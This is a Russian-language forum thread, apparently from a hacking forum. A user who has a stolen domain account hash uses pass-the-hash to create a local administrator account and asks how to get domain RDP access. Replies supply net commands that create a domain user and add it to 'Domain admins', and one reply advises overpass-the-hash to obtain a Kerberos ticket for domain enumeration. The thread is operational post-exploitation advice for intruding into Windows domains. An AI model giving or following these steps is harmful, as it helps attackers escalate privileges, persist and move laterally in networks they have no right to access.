Добавление пользователя в группу

[lucii]

Ситуация такая у меня есть доменный пользователь с правами записи., но без прав удаленного подключения.
Я при помощи этого пользователя создаю учетку через pass the hash, добавляю её в группу администраторов. И успешно подключаюсь по этой учетку по рдп. Но эта учетка локальная и не дает мне прав для сканирования домена.

Так вот вопрос как добавить учетку в домен через pass the hash? Или как добавить моего доменного пользователя в группу Remote Desktop Users?
Я уже все перепробовал, но учетка в группу не добавляется. Вот варианты команд которые я пробовал

"net localgroup Remote Desktop Users MYUSER /ad"
"net group Remote Desktop Users MYUSER /ad"
"net localgroup ""Remote Desktop Users"" MYUSER /ad"
"net group ""Remote Desktop Users"" MYUSER /ad"
"net localgroup Remote Desktop Users Domain\MYUSER /ad"
"net group Remote Desktop Users Domain\MYUSER /ad"
"net localgroup ""Remote Desktop Users"" Domain\MYUSER /ad"
"net group ""Remote Desktop Users"" ""Domain\MYUSER"" /ad"
"net localgroup Remote Desktop Users ""Domain\MYUSER"" /ad"
"net group Remote Desktop Users ""Domain\MYUSER"" /ad"
"net localgroup ""Remote Desktop Users"" ""Domain\MYUSER"" /ad"
"net group ""Remote Desktop Users"" ""Domain\MYUSER"" /ad"


Знает кто, что нужно сделать, чтобы добавить моего доменного юзера в Remote Desktop Users? Или как добавить юзера которого я создаю в домен?

 

[CCod]

net group "Remote Desktop Users" myuser /add

 

[lucii]

net group "Remote Desktop Users" myuser /add

не добавилось так, пробовал... но я делал через pass the hash... там другая команда получается, кавычки двойные нужны, потому что сама команда уже в кавычках. Но не сработало короче так

 

[oblachko]

net localgroup "Remote Desktop Users" MYUSER /add , не важно через pth или в cmd , всегда так работало. Может у тебя прав недостаточно.

 

[KasperWAF]

Ты забыл параметр /dom (/domain),

net user user123 Password1337 /add /dom

net group "Domain admins" user123 /add /dom

 

[oblachko]

Ты забыл параметр /dom (/domain),

с локальной учетки?

 

[oblachko]

не так прочитал что пишет тс

Ты забыл параметр /dom (/domain),

 

[KasperWAF]

с локальной учетки?

С доменной, он же говорит, что у него есть хеш доменного пользователя. Вопрос не совсем понятен, если имеется ввиду наличие прав записи на удалённый хост, то (если админ права на этом хосте все таки есть), группа "Remote Desktop Users" может называться по другому в зависимости от локали системы.

 

[0x60b1iN]

Ситуация такая у меня есть доменный пользователь с правами записи., но без прав удаленного подключения.
Я при помощи этого пользователя создаю учетку через pass the hash, добавляю её в группу администраторов. И успешно подключаюсь по этой учетку по рдп. Но эта учетка локальная и не дает мне прав для сканирования домена.

Так вот вопрос как добавить учетку в домен через pass the hash? Или как добавить моего доменного пользователя в группу Remote Desktop Users?
Я уже все перепробовал, но учетка в группу не добавляется. Вот варианты команд которые я пробовал

"net localgroup Remote Desktop Users MYUSER /ad"
"net group Remote Desktop Users MYUSER /ad"
"net localgroup ""Remote Desktop Users"" MYUSER /ad"
"net group ""Remote Desktop Users"" MYUSER /ad"
"net localgroup Remote Desktop Users Domain\MYUSER /ad"
"net group Remote Desktop Users Domain\MYUSER /ad"
"net localgroup ""Remote Desktop Users"" Domain\MYUSER /ad"
"net group ""Remote Desktop Users"" ""Domain\MYUSER"" /ad"
"net localgroup Remote Desktop Users ""Domain\MYUSER"" /ad"
"net group Remote Desktop Users ""Domain\MYUSER"" /ad"
"net localgroup ""Remote Desktop Users"" ""Domain\MYUSER"" /ad"
"net group ""Remote Desktop Users"" ""Domain\MYUSER"" /ad"


Знает кто, что нужно сделать, чтобы добавить моего доменного юзера в Remote Desktop Users? Или как добавить юзера которого я создаю в домен?

Если у тебя есть доменная учетка и локальный админ, то с локальной учетки сделай overpass the hash и получи тикет для доменного пользователя, и используй его для энумерации домена. Зачем ты лишнее движения делаешь